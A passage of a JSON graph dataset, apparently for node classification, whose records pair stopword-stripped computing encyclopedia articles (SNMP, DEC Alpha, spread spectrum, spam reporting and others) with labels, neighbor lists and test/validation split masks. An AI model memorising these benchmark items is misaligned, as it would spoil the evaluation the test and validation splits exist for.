prevent easy discovery community snmp configured pass community-name authentication failure traps snmp management device needs configured react authentication failure trap snmpv1 v2 vulnerable ip spoofing attacks whether runs tcp udp subject bypassing device access lists might implemented restrict snmp access snmpv3 security mechanisms usm tsm prevent successful attack would pointless employ snmpv3 vacm view-based access control without securing messages usm tsm",
    "neighbors": [
      10242,
      1030,
      7175,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      3629,
      3118,
      7214,
      8238,
      562,
      1586,
      9269,
      11319,
      11321,
      5181,
      6723,
      11332,
      8265,
      4687,
      11344,
      4691,
      2653,
      2656,
      1634,
      1637,
      10341,
      10344,
      3181,
      3695,
      4723,
      2679,
      1655,
      4729,
      5249,
      6273,
      5251,
      7812,
      9860,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      4771,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      2737,
      9909,
      4793,
      7865,
      4797,
      702,
      704,
      8386,
      7364,
      10437,
      7368,
      8905,
      1229,
      5843,
      7895,
      10461,
      7391,
      3297,
      1250,
      3299,
      2797,
      751,
      8432,
      8946,
      5875,
      3322,
      9987,
      3847,
      1297,
      10005,
      1814,
      5402,
      5405,
      6433,
      9511,
      296,
      3880,
      7983,
      7984,
      10035,
      8504,
      5433,
      2362,
      10748,
      829,
      5437,
      5440,
      1859,
      2373,
      2887,
      10058,
      849,
      6993,
      1876,
      8533,
      2390,
      10070,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      11112,
      361,
      367,
      891,
      6524,
      2431,
      11647,
      2947,
      10115,
      7557,
      6541,
      7570,
      5531,
      1440,
      10144,
      10659,
      933,
      4005,
      2983,
      10159,
      6577,
      6067,
      2996,
      10171,
      3006,
      6597,
      9670,
      1993,
      2509,
      8669,
      8670,
      10723,
      10727,
      3564,
      4085,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "Test"
  },
  {
    "node_id": 3134,
    "label": 2,
    "text": "Joe_Ossanna:joe ossanna joseph f. ossanna december 10 1928 detroit michigan – november 28 1977 morristown new jersey worked member technical staff bell telephone laboratories murray hill new jersey became actively engaged software design multics multiplexed information computing service general-purpose operating system used bell ossanna received bachelor engineering b.s.e.e wayne state university 1952 bell telephone labs ossanna concerned low-noise amplifier design feedback amplifier design satellite look-angle prediction mobile radio fading theory statistical data processing also concerned operation murray hill computation center actively engaged software design multics learning program pdp-7 computer ken thompson dennis ritchie joe ossanna rudd canaday began program operating system designed earlier thompson unics later named unix writing file system set basic utilities assembler core unix operating system established doug mcilroy later wrote ossanna instincts motor pool sergeant equipped first lab attracted first outside users team got graphic systems cat phototypesetter making camera-ready copy professional articles publication patent applications ossanna wrote version nroff would drive dubbed troff typesetter roff 1973 authored first version troff unix entirely written pdp-11 assembly language however two years later ossanna re-wrote code c programming language planned another rewrite supposed improve usability work taken brian kernighan ossanna member association computing machinery sigma xi tau beta pi died consequence heart disease",
    "neighbors": [
      477,
      7983,
      11023,
      9298,
      6772,
      5492,
      823,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3135,
    "label": 4,
    "text": "System_Safety_Monitor:system safety monitor system safety monitor ssm hips software behavior blocker developed system safety ltd windows platform ssm rely signatures detect malware instead monitors system certain types suspicious behavior warns user giving chance block allow like behavior blockers hips ssm warns certain event behavior occurs process causes warnings might legitimate software tasks though user decide whether allow block behavior ssm began private project 2002 one first behavior blockers aimed home user market april 2005 sold group professionals started syssafety company went commercial released first 2.0 beta series september 2005 june 2006 series split 2 lines first freeware version 2.0 features original 1.9 series plus improvements also 2.1 commercial version improvements freeware version particularly improved registry control hooking opposed polling low level keylogging control better termination protection new 2.1 version also dropped support windows 98 windows ssm similar many products class offers termination protection process filtering blocking driver installs etc separates hips programs offers process filtering also parent-child control processes means instead giving process complete rights start specify restrictive rules given process started another specific process example might want allow windows explorer start web browser might want processes start browser might exploit browser phone home see also leak tests ssm used effectively spyware adware programs well rootkits trojans keyloggers dialers browser hijackers commercial surveillance software however relies entirely user responding correctly prompts beginners might confused prompts respond incorrectly worst-case scenario lead malware infecting system allowing dangerous activity system error blocking activity needed system ssm also offers learning mode rules automatically made needed creating baseline normal operations assumes system clean ssm learn allow malware regardless training mode whenever new unknown process run prompt created unless user chooses block prompts",
    "neighbors": [
      10756,
      877,
      6797,
      7983,
      10392,
      7515,
      9791
    ],
    "mask": "Test"
  },
  {
    "node_id": 3136,
    "label": 3,
    "text": "Princess_Tomato_in_the_Salad_Kingdom:princess tomato salad kingdom ported may 27 1988 famicom february 8 1991 nintendo entertainment system north america also released wii virtual console japan january 19 2010 north america february 8 2010 characters primarily cartoon-like anthropomorphic fruits vegetables taking role sir cucumber knight player assigned king broccoli deceased defeat evil minister pumpkin kidnapped princess tomato early sir cucumber gains sidekick percy baby persimmon offers advice helps throughout quest always refers sir cucumber boss princess tomato salad kingdom plays similarly text adventure though due nes lack keyboard accessory possible commands represented buttons line sides screen commands fixed change gameplay primarily game consists still screens exception finger wars rock paper scissors mazes occasional animated character octoberry fernbirds players issue commands game protagonist way lose able determine action required advance failing defeat end-game boss minister pumpkin game finger wars",
    "neighbors": [
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3137,
    "label": 3,
    "text": "Compatibility_mode:compatibility mode compatibility mode software mechanism software either emulates older version software mimics another operating system order allow older incompatible software files remain compatible computer newer hardware software examples software using mode operating systems internet explorer compatibility mode operating system software mechanism computer operating system emulates older processor operating system and/or hardware platform order allow older software remain compatible computer newer hardware software differs full-fledged emulator emulator typically creates virtual hardware architecture host system rather simply translating older system function calls calls host system understand examples include classic mode mac os x windows 2000 windows xp windows vista windows 7 compatibility mode allow applications designed older versions operating system run examples include wine run windows programs linux os x mono run .net programs various unix-like systems compatibility view compatibility mode feature web browser internet explorer version 8 later active compatibility view forces ie display webpage quirks mode page viewed ie7 compatibility view activated ie said running native mode ie11 user turn compatibility mode web site clicking gears icon clicking compatibility view settings internet explorer 8 promoted microsoft stricter adherence w3c described web standards internet explorer 7 result every ie version percentage web pages coded behavior older versions would break ie8 would repetition situation ie7 fixed bugs ie6 broke pages used ie6-specific hacks work around non-compliance especially problem offline html documents may updatable e.g stored read-only medium cd-rom dvd-rom avoid situation ie8 implemented form version targeting whereby page could authored specific version browser using codice_1 declaration either meta element http headers order maintain backwards compatibility sites opt ie7-like handling content inserting specially created meta element web page triggers compatibility mode browser using newer version browser page coded would emulate behavior older version assumptions page made browser behavior hold true microsoft proposed page doctype triggers standards mode almost standards mode ie7 would default trigger ie7-like behavior called standards mode called strict mode ie8 future versions ie new features ie8 enabled trigger microsoft called ie8 standards mode called standards mode doctypes trigger quirks mode ie7 continue ie8 peter bright ars technica claimed idea using meta tag pick specific rendering mode fundamentally misses point standards-based development positioned issue one idealism versus pragmatism web development noting web maintained demanding web developers update sites ensure continue work properly future browser version probably much ask result ie 8 beta 1 could render three modes quirks strict standard old doctype doctype ie renders like ie5 would quirks mode special meta element corresponding http header included web page ie8 render page like ie7 would strict mode otherwise ie8 renders pages engine standard mode users switch three modes clicks release internet explorer 8 beta 1 revealed many web sites work new standards mode microsoft maintains list websites reported problems ie8 standards mode known compatibility view list user enables list ie8 render websites list using compatibility view mode list occasionally updated add newly reported problematic websites well remove websites whose owners requested removal internet explorer team also tests websites list compatibility issues removes none found",
    "neighbors": [
      1632,
      2432,
      7713,
      10916,
      9097,
      4331,
      6028,
      8301,
      7983,
      1776,
      3573,
      5397,
      823,
      11610,
      1501
    ],
    "mask": "None"
  },
  {
    "node_id": 3138,
    "label": 2,
    "text": "Core_common_area:core common area core common area named magnetic core memory term persisted modern era commonly used fortran basic languages",
    "neighbors": [
      3960,
      3062
    ],
    "mask": "Test"
  },
  {
    "node_id": 3139,
    "label": 4,
    "text": "NolaCon_(infosec_conference):nolacon infosec conference nolacon information security conference held annually new orleans united states first year 2014 nolacon held sheraton canal st. 2015 2016 2017 2018 2019 may 17-19 conference astor crowne plaza new orleans french quarter",
    "neighbors": [
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3140,
    "label": 5,
    "text": "Spread_spectrum:spread spectrum telecommunication radio communication spread-spectrum techniques methods signal e.g. electrical electromagnetic acoustic signal generated particular bandwidth deliberately spread frequency domain resulting signal wider bandwidth techniques used variety reasons including establishment secure communications increasing resistance natural interference noise jamming prevent detection limit power flux density e.g. satellite links technique telecommunication signal transmitted bandwidth considerably larger frequency content original information frequency hopping basic modulation technique used spread spectrum signal transmission spread-spectrum telecommunications signal structuring technique employs direct sequence frequency hopping hybrid used multiple access and/or multiple functions technique decreases potential interference receivers achieving privacy spread spectrum generally makes use sequential noise-like signal structure spread normally narrowband information signal relatively wideband radio band frequencies receiver correlates received signals retrieve original information signal originally two motivations either resist enemy efforts jam communications anti-jam aj hide fact communication even taking place sometimes called low probability intercept lpi frequency-hopping spread spectrum fhss direct-sequence spread spectrum dsss time-hopping spread spectrum thss chirp spread spectrum css combinations techniques forms spread spectrum first two techniques employ pseudorandom number sequences—created using pseudorandom number generators—to determine control spreading pattern signal across allocated bandwidth wireless standard ieee 802.11 uses either fhss dsss radio interface frequency-hopping may date back radio pioneer jonathan zenneck 1908 german book wireless telegraphy although states telefunken using previously saw limited use german military world war put forward polish engineer leonard danilewicz 1929 showed patent 1930s willem broertjes issued aug. 2 1932 top-secret us army signal corps world war ii communications system named sigsaly world war ii golden age hollywood actress hedy lamarr avant-garde composer george antheil developed intended jamming-resistant radio guidance system use allied torpedoes patenting device us patent 2,292,387 secret communications system august 11 1942 approach unique frequency coordination done paper player piano rolls novel approach never put practice spread-spectrum clock generation sscg used synchronous digital systems especially containing microprocessors reduce spectral density electromagnetic interference emi systems generate synchronous digital system one driven clock signal periodic nature unavoidably narrow frequency spectrum fact perfect clock signal would energy concentrated single frequency desired clock frequency harmonics practical synchronous digital systems radiate electromagnetic energy number narrow bands spread clock frequency harmonics resulting frequency spectrum certain frequencies exceed regulatory limits electromagnetic interference e.g fcc united states jeita japan iec europe spread-spectrum clocking avoids problem using one methods previously described reduce peak radiated energy therefore electromagnetic emissions comply electromagnetic compatibility emc regulations become popular technique gain regulatory approval requires simple equipment modification even popular portable electronics devices faster clock speeds increasing integration high-resolution lcd displays ever smaller devices devices designed lightweight inexpensive traditional passive electronic measures reduce emi capacitors metal shielding viable active emi reduction techniques spread-spectrum clocking needed cases however spread-spectrum clocking like kinds dynamic frequency change also create challenges designers principal among clock/data misalignment clock skew note method reduce total radiated energy therefore systems necessarily less likely cause interference spreading energy larger bandwidth effectively reduces electrical magnetic readings within narrow bandwidths typical measuring receivers used emc testing laboratories divide electromagnetic spectrum frequency bands approximately 120 khz wide system test radiate energy narrow bandwidth would register large peak distributing energy larger bandwidth prevents systems putting enough energy one narrowband exceed statutory limits usefulness method means reduce real-life interference problems often debated perceived spread-spectrum clocking hides rather resolves higher radiated energy issues simple exploitation loopholes emc legislation certification procedures situation results electronic equipment sensitive narrow bandwidth experiencing much less interference broadband sensitivity even operated higher frequencies radio receiver tuned different station experience interference fcc certification testing often completed spread-spectrum function enabled order reduce measured emissions within acceptable legal limits however spread-spectrum functionality may disabled user cases example area personal computers bios writers include ability disable spread-spectrum clock generation user setting thereby defeating object emi regulations might considered loophole generally overlooked long spread-spectrum enabled default ability disable spread-spectrum clocking computer systems considered useful overclocking spread spectrum lower maximum clock speed achievable due clock skew",
    "neighbors": [
      4609,
      3847,
      9863,
      2057,
      10381,
      1550,
      2968,
      8600,
      2458,
      5020,
      9373,
      5664,
      11686,
      7723,
      11181,
      1070,
      1969,
      2994,
      5304,
      1083,
      7490,
      3140,
      7108,
      11591,
      5321,
      7498,
      9038,
      4061,
      3040,
      1121,
      3168,
      8160,
      9057,
      2920,
      7400,
      1515,
      4334,
      2802,
      119
    ],
    "mask": "None"
  },
  {
    "node_id": 3141,
    "label": 7,
    "text": "Illuminate_Labs:illuminate labs illuminate labs swedish software company based gothenburg founded 2002 specializing video games lighting company produces two middleware products called beast turtle based liquidlight technology illuminate labs products used largest game studios world electronic arts blizzard sony computer entertainment square enix bioware illuminate labs opened office san francisco 2009 autodesk acquired illuminate labs july 21 2010 san rafael california undisclosed amount turtle rendering baking plugin autodesk maya used lighting content creation next-gen game development turtle create global illumination game levels bake illumination texture maps vertex maps point clouds features include baking occlusion normal maps highly detailed models low polygon models baked results visualized maya viewport using gpu beast content pipeline tool used advanced global illumination dynamic character relighting beast enables advanced global illumination enhances look video games little effort beast precalculate lighting light maps shadow maps point clouds bake occlusion normal maps generate light fields dynamic relighting characters objects several game titles made beast and/or turtle company part epic ’ integrated partners program emergent certified partner official autodesk conductors partner partners include 3d labs adobe apple angstrom ati nvidia microsoft pixologic unity technologies announced next unity version 3.0 feature built-in beast lightmapping global illumination shelf",
    "neighbors": [
      8122,
      9691
    ],
    "mask": "Test"
  },
  {
    "node_id": 3142,
    "label": 3,
    "text": "DEC_Alpha:dec alpha alpha originally known alpha axp 64-bit reduced instruction set computing risc instruction set architecture isa developed digital equipment corporation dec designed replace 32-bit vax complex instruction set computer cisc isa alpha implemented microprocessors originally developed fabricated dec microprocessors prominently used variety dec workstations servers eventually formed basis almost mid-to-upper-scale lineup several third-party vendors also produced alpha systems including pc form factor motherboards operating systems supported alpha included openvms previously known openvms axp tru64 unix previously known dec osf/1 axp digital unix windows nt discontinued nt 4.0 pre-release windows 2000 rc1 linux debian suse gentoo red hat bsd unix netbsd openbsd freebsd 6.x plan 9 bell labs well l4ka :pistachio kernel alpha architecture sold along parts dec compaq 1998 compaq already intel customer phased alpha favor forthcoming hewlett-packard/intel itanium architecture sold alpha intellectual property intel 2001 effectively killing product hewlett-packard purchased compaq later year continuing development existing product line 2004 selling alpha-based systems largely existing customer base april 2007 alpha born earlier risc project named prism parallel reduced instruction set machine product several earlier projects prism intended flexible design supporting unix-like applications well digital existing vms programs vax minor conversion new unix-like operating system known mica would run applications natively supporting vms emulation running time development palo alto design team working unix-only workstation originally included prism however development workstation well ahead prism engineers proposed release machines using mips r2000 processor instead moving release date considerably dec management doubted need produce new computer architecture replace existing vax decstation lines eventually ended prism project 1988 time cancellation however second-generation risc chips newer sparc architecture offering much better price/performance ratios vax lineup clear third generation would completely outperform vax ways cost another study started see new risc architecture could defined could directly support vms operating system new design used basic prism concepts re-tuned allow vms vms programs run reasonable speed conversion decision also made upgrade design full 64-bit implementation prism 32-bit conversion major risc vendors undertaking eventually new architecture became alpha primary alpha instruction set architects richard l. sites richard t. witek prism epicode developed alpha palcode providing abstracted interface platform- processor implementation-specific features main contribution alpha microprocessor industry main reason performance much architecture rather implementation time microchip industry dominated automated design layout tools chip designers digital continued pursuing sophisticated manual circuit design order deal overly complex vax architecture alpha chips showed manual circuit design applied simpler cleaner architecture allowed much higher operating frequencies possible automated design systems chips caused renaissance custom circuit design within microprocessor design community originally alpha processors designated decchip 21x64 series decchip replaced mid-1990s alpha first two digits 21 signifies 21st century last two digits 64 signifies 64 bits alpha designed 64-bit start 32-bit version middle digit corresponded generation alpha architecture internally alpha processors also identified ev numbers ev officially standing extended vax alternative humorous meaning electric vlasic giving homage electric pickle experiment western research lab first generations alpha chips innovative time persistent report attributed dec insiders suggests choice axp tag processor made dec legal department still smarting vax trademark fiasco lengthy search tag axp found entirely unencumbered within computer industry joke got started acronym axp meant almost exactly prism alpha architecture intended high-performance design digital intended architecture support one-thousandfold increase performance twenty-five years ensure architectural feature impeded multiple instruction issue clock rate multiprocessing removed result alpha alpha condition codes integer instructions remove potential bottleneck condition status register instructions resulting overflow adding two numbers whose result fit 64 bits write 32 64 least significant bits destination register carry generated performing unsigned compare result either operand see result smaller either operand test true value one written least significant bit destination register indicate condition architecture defined set 32 integer registers set 32 floating-point registers addition program counter two lock registers floating-point control register fpcr also defined registers optional implemented implementation required lastly registers palcode defined integer registers denoted r0 r31 floating-point registers denoted f0 f31 r31 f31 registers hardwired zero writes registers instructions ignored digital considered using combined register file split register file determined better enabled two-chip implementations register file located chip integer-only implementations omit floating-point register file containing floating point registers split register file also determined suitable multiple instruction issue due reduced number read write ports number registers per register file also considered 32 64 contenders digital concluded 32 registers suitable required less die space improved clock frequencies number registers deemed major issue respect performance future growth thirty-two registers could support least eight-way instruction issue program counter 64-bit register contains longword-aligned virtual byte address low two bits program counter always zero pc incremented four address next instruction instruction decoded lock flag locked physical address register used load-locked store-conditional instructions multiprocessor support floating-point control register fpcr 64-bit register defined architecture intended use alpha implementations ieee 754-compliant floating-point hardware alpha architecture byte defined 8-bit datum octet word 16-bit datum longword 32-bit datum quadword 64-bit datum octaword 128-bit datum alpha architecture originally defined six data types maintain level compatibility vax 32-bit architecture preceded alpha two floating-point data types included alpha 64-bit linear virtual address space memory segmentation implementations implement smaller virtual address space minimum size 43 bits although unused bits implemented hardware tlbs architecture required implementations check whether zero ensure software compatibility implementations larger full virtual address space alpha isa fixed instruction length 32 bits six instruction formats integer operate format used integer instructions contains 6-bit opcode field followed ra field specifies register containing first operand rb field specifies register containing second operand next 3-bit field unused reserved 1-bit field contains 0 distinguished format integer literal format 7-bit function field follows used conjunction opcode specify operation last field rc field specifies register result computation written register fields 5 bits long required address 32 unique locations 32 integer registers integer literal format used integer instructions use literal one operands format integer operate format except replacement 5-bit rb field 3 bits unused space 8-bit literal field zero-extended 64-bit operand floating-point operate format used floating-point instructions similar integer operate format 11-bit function field made possible using literal unused bits reserved integer operate format memory format used mostly load store instructions 6-bit opcode field 5-bit ra field 5-bit rb field 16-bit displacement field branch instructions 6-bit opcode field 5-bit ra field 21-bit displacement field ra field specifies register tested conditional branch instruction condition met program counter updated adding contents displacement field program counter displacement field contains signed integer value integer positive branch taken program counter incremented value integer negative program counter decremented branch taken range branch thus ±1 mi instructions ±4 mib alpha architecture designed large range part architecture forward-looking goal call_pal format used codice_1 instruction used call palcode subroutines format retains opcode field replaces others 26-bit function field contains integer specifying pal subroutine control instructions consist conditional unconditional branches jumps conditional unconditional branch instructions use branch instruction format jump instructions use memory instruction format conditional branches test whether least significant bit register set clear compare register signed quadword zero branch specified condition true conditions available comparing register zero equality inequality less less equal greater equal greater new address computed longword aligning sign extending 21-bit displacement adding address instruction following conditional branch unconditional branches update program counter new address computed way conditional branches also save address instruction following unconditional branch register two instructions differ hints provided branch prediction hardware four jump instructions perform operation saving address instruction following jump providing program counter new address register differ hints provided branch prediction hardware unused displacement field used purpose integer arithmetic instructions perform addition multiplication subtraction longwords quadwords comparison quadwords instruction division architects considered implementation division hardware adverse simplicity addition standard add subtract instructions scaled versions versions shift second operand left two three bits adding subtracting multiply longword multiply quadword instructions write least significant 32 64 bits 64- 128-bit result destination register respectively since useful obtain significant half unsigned multiply quadword high umulh instruction provided umulh used implementing multi-precision arithmetic division algorithms concept separate instruction multiplication returns significant half result taken prism instructions operate longwords ignore significant half register 32-bit result sign-extended written destination register default add multiply subtract instructions exception umulh scaled versions add subtract trap overflow functionality required versions instructions perform overflow detection trap overflow provided compare instructions compare two registers register literal write 1 destination register specified condition true 0 conditions equality inequality less equal less exception instructions specify former two conditions versions perform signed unsigned compares integer arithmetic instructions use integer operate instruction formats logical instructions consist performing bitwise logical operations conditional moves integer registers bitwise logical instructions perform nand xnor xor two registers register literal conditional move instructions test register signed quadword zero move specified condition true specified conditions equality inequality less equal less greater equal greater shift instructions perform arithmetic right shift logical left right shifts shift amount given register literal logical shift instructions use integer operate instruction formats later alpha included byte-word extensions set instructions manipulate 8-bit 16-bit data types instructions first introduced 21164a ev56 microprocessor present subsequent implementations instructions performed operations previously required multiple instructions implement improved code density performance certain applications bwx also made emulation x86 machine code writing device drivers easier motion video instructions mvi instruction set extension alpha isa added instructions single instruction multiple data simd operations alpha implementations implement mvi chronological order alpha 21164pc pca56 pca57 alpha 21264 ev6 alpha 21364 ev7 unlike simd instruction sets period mips mdmx sparc visual instruction set like pa-risc multimedia acceleration extensions mvi simple instruction set composed instructions operate integer data types stored existing integer registers mvi simplicity due two reasons firstly digital determined alpha 21164 already capable performing dvd decoding software therefore requiring hardware provisions purpose inefficient mpeg-2 encoding second reason requirement retain fast cycle times implementations adding many instructions would complicated enlarged instruction decode logic reducing implementation clock frequency mvi consisted 13 instructions floating-point extensions fix extension alpha architecture introduced nine instructions floating-point square-root transferring data integer registers floating-point registers alpha 21264 ev6 first microprocessor implement instructions count extensions cix extension architecture introduced three instructions counting bits instructions categorized integer arithmetic instructions first implemented alpha 21264a ev67 time announcement alpha heralded architecture next 25 years alpha nevertheless reasonably long life first version alpha 21064 otherwise known ev4 introduced november 1992 running 192 mhz slight shrink die ev4s shrunk 0.75 µm 0.675 µm ran 200 mhz months later 64-bit processor superpipelined superscalar design like risc designs nevertheless outperformed dec touted world fastest processor careful attention circuit design hallmark hudson design team like huge centralized clock circuitry allowed run cpu higher speeds even though microarchitecture fairly similar risc chips comparison less expensive intel pentium ran 66 mhz launched following spring alpha 21164 ev5 became available 1995 processor frequencies 333 mhz july 1996 line speed bumped 500 mhz march 1998 666 mhz also 1998 alpha 21264 ev6 released 450 mhz eventually reaching 2001 21264c/ev68cb 1.25 ghz 2003 alpha 21364 ev7 marvel launched essentially ev68 core four 1.6 gb/s inter-processor communication links improved multiprocessor system performance running 1 1.15 ghz 1996 production alpha chips licensed samsung electronics company following purchase digital compaq majority alpha products placed api networks inc. previously alpha processor inc. private company funded samsung compaq october 2001 microway became exclusive sales service provider api networks alpha-based product line june 25 2001 compaq announced alpha would phased 2004 favor intel itanium canceled planned ev8 chip sold alpha intellectual property intel hp new owner compaq later year announced development alpha series would continue years including release 1.3 ghz ev7 variant called ev7z would final iteration alpha 0.13 µm ev79 also canceled alpha also implemented piranha research prototype developed compaq corporate research nonstop hardware development groups western research laboratory systems research center piranha multicore design transaction processing workloads contained eight simple cores described 27th annual international symposium computer architecture june 2000 illustrate comparative performance alpha-based systems spec performance numbers specint95 specfp95 listed note spec results claim report measured performance whole computer system cpu bus memory compiler optimizer cpu also note benchmark scale changed 1992 1995 however figures give rough impression performance alpha architecture 64-bit compared contemporary hp 64-bit intel-based offerings 32-bit perhaps obvious trend intel could always get reasonably close alpha integer performance floating point performance difference considerable side hp pa-risc also reasonably close alpha cpus running significantly lower clock rates mhz tables lack two important values power consumption price cpu first generation dec alpha-based systems comprised dec 3000 axp series workstations low-end servers dec 4000 axp series mid-range servers dec 7000 axp 10000 axp series high-end servers dec 3000 axp systems used turbochannel bus previous mips-based decstation models whereas 4000 based futurebus+ 7000/10000 shared architecture corresponding vax models dec also produced pc-like alpha workstation eisa bus decpc axp 150 codename jensen also known dec 2000 axp first alpha system support windows nt dec later produced alpha versions celebris xl digital personal workstation pc lines 21164 processors digital also produced single board computers based vmebus embedded industrial use first generation included 21068-based axpvme 64 axpvme 64lc 21066-based axpvme 160 introduced march 1 1994 later models axpvme 100 axpvme 166 axpvme 230 based 21066a processor alpha vme 4/224 alpha vme 4/288 based 21064a processor last models alpha vme 5/352 alpha vme 5/480 based 21164 processor 21066 chip used dec multia vx40/41/42 compact workstation alphabook 1 laptop tadpole technology 1994 dec launched new range alphastation alphaserver systems used 21064 21164 processors introduced pci bus vga-compatible frame buffers ps/2-style keyboards mice alphaserver 8000 series superseded dec 7000/10000 axp also employed xmi futurebus+ buses alphastation xp1000 first workstation based 21264 processor later alphaserver/station models based 21264 categorised ds departmental server es enterprise server gs global server families final 21364 chip used alphaserver es47 es80 gs1280 models alphastation es47 number oem motherboards produced dec 21066 21068-based axppci 33 noname part major push oem market company 21164-based alphapc 164 alphapc 164lx 21164pc-based alphapc 164sx alphapc 164rx 21264-based alphapc 264dp several third parties samsung api also produced oem motherboards api up1000 up2000 assist third parties developing hardware software platform dec produced evaluation boards eb64+ eb164 alpha 21064a 21164 microprocessors respectively 21164 21264 processors used netapp various network-attached storage systems 21064 21164 processors used cray t3d t3e massively parallel supercomputers fastest supercomputer based alpha processors",
    "neighbors": [
      10752,
      7173,
      9739,
      9742,
      2066,
      3603,
      7699,
      8725,
      5655,
      5658,
      10779,
      8732,
      10781,
      7204,
      6181,
      8231,
      2088,
      6187,
      3630,
      4144,
      6705,
      7218,
      1085,
      10813,
      2623,
      2113,
      7234,
      1606,
      3142,
      8266,
      2638,
      4699,
      8795,
      2655,
      1122,
      10851,
      3175,
      7783,
      2155,
      8815,
      8315,
      636,
      3197,
      6268,
      639,
      641,
      2179,
      2180,
      9353,
      4237,
      142,
      6797,
      7313,
      8851,
      2199,
      9369,
      9371,
      8861,
      3230,
      6815,
      11424,
      5793,
      6818,
      6821,
      6311,
      682,
      7852,
      4269,
      9391,
      2224,
      2225,
      2226,
      3250,
      7858,
      9911,
      8890,
      4286,
      6846,
      6854,
      8390,
      9932,
      5326,
      3791,
      5329,
      8402,
      5844,
      9428,
      7382,
      10966,
      219,
      731,
      11487,
      3296,
      7911,
      4841,
      10985,
      1260,
      5356,
      5358,
      9452,
      1776,
      5873,
      8944,
      9964,
      757,
      2805,
      9976,
      249,
      2811,
      8700,
      8450,
      2821,
      1798,
      5381,
      5384,
      1801,
      7432,
      7941,
      6924,
      6926,
      783,
      6415,
      3857,
      274,
      1298,
      8976,
      11539,
      9723,
      8474,
      1820,
      9500,
      6942,
      2339,
      6950,
      9003,
      3886,
      7471,
      7983,
      10548,
      309,
      8501,
      823,
      7992,
      8502,
      8506,
      9525,
      5948,
      833,
      8514,
      9541,
      3911,
      4423,
      7505,
      9044,
      11604,
      344,
      8539,
      2398,
      1376,
      4961,
      3945,
      10603,
      9582,
      8048,
      4465,
      10612,
      3445,
      1399,
      10104,
      7033,
      1402,
      3451,
      10620,
      3457,
      6529,
      10121,
      4491,
      3470,
      5518,
      5523,
      2452,
      6038,
      407,
      408,
      409,
      10658,
      7076,
      3493,
      9126,
      9637,
      936,
      426,
      1964,
      10669,
      1967,
      2480,
      6063,
      11184,
      8627,
      10675,
      1461,
      1462,
      1463,
      8120,
      10680,
      1469,
      4030,
      8125,
      8126,
      5569,
      9151,
      6084,
      453,
      3014,
      8136,
      4553,
      6607,
      977,
      466,
      2514,
      11218,
      2517,
      1499,
      7134,
      3042,
      995,
      5090,
      7653,
      10220,
      1005,
      10732,
      6639,
      7151,
      10733,
      10734,
      499,
      4596,
      2039,
      10746,
      4603,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 3143,
    "label": 7,
    "text": "Naren_Gupta:naren gupta narendra gupta born 1948 one india ’ highest profile venture capital investors founder investment company nexus venture partners well various investment software firms also ceo president integrated systems inc. isi decade half 2007 gupta founded nexus venture partners silicon valley investment firm “ homegrown indian operation extensive reach experience overseas notably silicon valley. ” made investments variety technical media startups around india united states boasts 1bn management active portfolio 60+ firms throughout following industries business services consumer healthcare internet technology gupta – via nexus – made investments several developers products including hypertrack h2o software postman also made unique cloud investments ” aryaka dimdim druva mcheck pubmatic snapdeal companies share similar trait developed entrepreneurs india serve international markets interview wall street journal gupta said within years india would building “ billion-dollar startups. ” said traditional approach investment used silicon valley really accepted india sees great deal “ untapped potential ” software industries like cloud computing mobile apps yet “ special challenges ” investing india gupta expanded “ certainly fast-growing startups need hand-holding need u.s quite bit technology talent india ’ leadership marketing talent. ” plus often push indian entrepreneurs sell early rather waiting develop “ billion dollar enterprise many years. ” nexus gupta developed greater sense work within indian culture said “ investors u.s. ’ understand family-run businesses india run. ” basically indian entrepreneurs get program order understand “ tickles fancy consumers ” since one independent firm emerged key player gupta says “ makes sense korea done japan china india. ” regarding indian e-commerce gupta said recently exploded explained “ every investor wanted e-commerce investor – valuations doubling every month completely ridiculous. ” euphoria dissipated speaking indian prime minister narendra modi gupta quoted saying “ innovation state mind saying help bring state mind india big changes pretty much impossible make need democracy take thousand little steps. ” gupta co-founder ceo president integrated systems inc. isi decade-and-a-half 1990 took public merging wind river systems remained board acquired intel boasts two decades experience field early early-growth stage investment america india gupta chairman board red hat member board trustees california institute technology asia society northern california also sits variety privately held companies gives counsel entrepreneurs throughout world gupta bachelor technology degree indian institute technology master science california institute technology ph.d stanford university gupta recipient president ’ gold medal indian institute technology delhi well elected fellow ieee received distinguished alumni awards iit caltech",
    "neighbors": [
      4194,
      9455
    ],
    "mask": "None"
  },
  {
    "node_id": 3144,
    "label": 9,
    "text": "Nickle_(programming_language):nickle programming language nickle numeric oriented programming language keith packard bart massey originally used desktop calculation since expanded prototyping complicated algorithms",
    "neighbors": [
      9345,
      6502,
      8262,
      5612,
      5677,
      7983,
      4341,
      7386,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3145,
    "label": 4,
    "text": "Spam_reporting:spam reporting spam reporting properly called abuse reporting activity pinning abusive messages report kind authority dealt reported messages email messages blog comments kind spam abuse reports particular kind feedback whereby users flag users posts abusive content web sites allow user generated content either apply sort moderation based abuse reports hiding deleting offending content defined threshold implement variety user roles allow users govern site contents cooperatively spammers behavior ranges somehow forcing users opt cooperatively offering possibility opt wildly hiding sender identity including phishing intractable cases dealt reporting abusive message hash-sharing systems like example vipul razor benefit victims cases may cooperative component sender side use spam reports fix mitigate problem origin example may use detect botnets educate sender simply unsubscribe report originator email spam legislation varies country forbidding abusive behavior extent cases may worth prosecuting spammers claiming damages rfc 6650 recommends recipients abusive messages report mailbox providers provider abuse-team determine best course action possibly considering hash-sharing legal steps sender subscribed feedback loop fbl mailbox provider forward complaint feedback report according existing fbl agreement otherwise mailbox providers determine responsible abuse forward complaint recipients unsolicited abuse reports actually prospect fbl subscribers inasmuch mailbox provider needs offer means manage report stream hand mailbox providers prevent messages non-cooperative senders abusive content abuse reports sent email using abuse reporting format arf except initial notification recipient cases mailbox implementation provides direct means target address abuse report depends authority abusive message going reported choices include following first three methods provide full email addresses send reports otherwise target abuse mailboxes assumed form defined rfc 2142 abuse example.com determined querying either rir whois databases—which may query result limits— databases created specifically purpose tendency mandate publication exact abuse 